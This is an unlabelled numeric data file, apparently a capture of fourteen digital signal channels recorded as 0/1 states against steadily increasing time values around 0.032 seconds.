1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796180e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796328e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796352e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796476e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796500e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796556e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796580e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796628e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796652e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796704e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796728e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796780e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796804e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796828e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796852e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796876e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796900e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796928e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1796952e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1796980e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797004e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797028e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797052e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797076e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797100e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797128e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797152e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797180e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797204e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797228e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797252e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797276e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797300e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797328e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797352e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797380e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797404e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797428e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797452e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797476e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797500e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797528e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797552e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797580e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797604e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797628e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797652e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797676e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797700e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797728e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797752e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797780e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797808e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797832e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797860e-02 1,0,0,0,0,0,0,0,0,0,0,0,0,0,3.1797880e-02 1,0,0,0,0,0,0,0,0,0,0,0,1,0,3.1797904e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,0,3.1797932e-02 1,0,0,0,0,1,0,0,0,1,0,0,0,1,3.1921796e-02 0,0,0,0,0,1,0,0,0,1,0,0,0,1,3.1922024e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922044e-02 0,1,0,0,0,1,0,0,0,1,0,1,0,1,3.1922064e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922092e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.1922388e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922416e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.1922440e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922468e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.1922492e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922516e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.1922540e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922564e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.1922588e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,1,3.1922616e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,1,3.1922668e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1922692e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,3.1922696e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1922700e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1922716e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1922740e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1922748e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1922792e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1922816e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1922840e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1922868e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1922892e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1922916e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1922940e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1922964e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1922988e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923016e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923040e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923068e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923072e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923092e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923116e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923164e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923188e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923196e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923216e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923240e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923268e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923292e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923316e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923340e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923364e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923388e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923396e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923444e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923468e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923492e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923516e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923520e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923540e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923564e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923588e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923616e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923640e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923668e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923692e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923716e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923740e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923764e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1923816e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1923840e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923848e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923868e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923892e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923916e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923940e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1923964e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1923988e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924016e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924040e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924068e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924092e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924116e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924140e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924164e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924188e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924216e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924240e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924244e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1924268e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924292e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1924340e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924364e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1924388e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924416e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1924440e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924468e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1924492e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924516e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924524e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924564e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924588e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924616e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924640e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924668e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924692e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924716e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924740e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924764e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924788e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924840e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924868e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1924916e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1924940e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924948e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1924964e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1924988e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925016e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925040e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925068e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925092e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925116e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925140e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925164e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925188e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925216e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925240e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925268e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925292e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925316e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925340e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925364e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925388e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925416e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925440e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925468e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925492e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925516e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925540e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925564e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925588e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925616e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925640e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925668e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925688e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925712e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1925740e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1925788e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1925812e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925836e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925860e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925888e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925912e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925940e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1925964e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1925988e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926012e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926088e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926112e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926140e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926164e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926188e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926212e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,3.1926216e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926220e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926236e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926260e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926316e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926340e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926348e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926364e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926388e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926412e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926436e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926460e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926488e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926512e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926540e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926564e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926588e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926612e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926636e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926688e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926716e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926740e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926764e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1926788e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1926812e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926820e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926836e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926860e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926888e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926912e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926940e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1926964e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1926988e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927012e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927088e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927112e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927140e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927164e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927188e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927212e-02 0,1,0,0,0,0,0,0,0,1,0,0,0,0,3.1927216e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927220e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927264e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927288e-02 0,1,0,0,0,1,0,0,0,0,0,0,0,0,3.1927292e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927296e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927312e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927340e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927364e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927388e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927412e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927436e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927460e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927488e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927512e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927540e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927564e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927588e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927592e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927612e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927636e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927660e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927688e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927712e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927740e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927764e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927788e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927812e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927836e-02 0,1,0,0,0,1,0,0,0,1,0,0,1,0,3.1927888e-02 0,1,0,0,0,1,0,0,0,1,0,0,0,0,3.1927916e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927920e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927940e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1927964e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1927988e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928012e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928088e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928112e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928140e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928164e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928188e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928212e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928236e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928260e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928288e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928312e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928340e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928364e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928388e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928412e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928436e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928460e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928488e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928512e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928540e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928564e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928588e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928612e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928636e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928660e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928688e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928712e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928740e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928764e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928788e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928812e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928836e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928860e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928888e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928912e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928940e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1928964e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1928988e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1929012e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1929036e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1929060e-02 0,1,0,0,0,0,0,0,0,0,0,0,1,0,3.1929088e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,0,3.1929112e-02 0,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2053764e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2053964e-02 1,1,0,0,0,0,0,0,0,0,0,1,0,1,3.2053996e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2054020e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.2054300e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2054324e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.2054348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2054376e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.2054400e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2054428e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.2054452e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,1,3.2054476e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,1,3.2054524e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,1,3.2054556e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,1,3.2054576e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2054596e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2054600e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054608e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2054628e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054652e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2054656e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2054700e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2054724e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054732e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2054752e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054776e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2054800e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054828e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2054852e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054876e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2054900e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054924e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2054952e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2054976e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055000e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2055028e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2055076e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2055100e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055108e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055124e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055152e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055176e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055200e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055228e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055252e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055276e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055300e-02 1,1,0,0,0,0,0,0,0,1,0,0,0,0,3.2055304e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2055308e-02 1,1,0,0,0,1,0,0,0,1,0,0,1,0,3.2055324e-02 1,1,0,0,0,1,0,0,0,1,0,0,0,0,3.2055348e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055356e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055376e-02 1,1,0,0,0,0,0,0,0,0,0,0,0,0,3.2055400e-02 1,1,0,0,0,0,0,0,0,0,0,0,1,0,3.2055428e-02 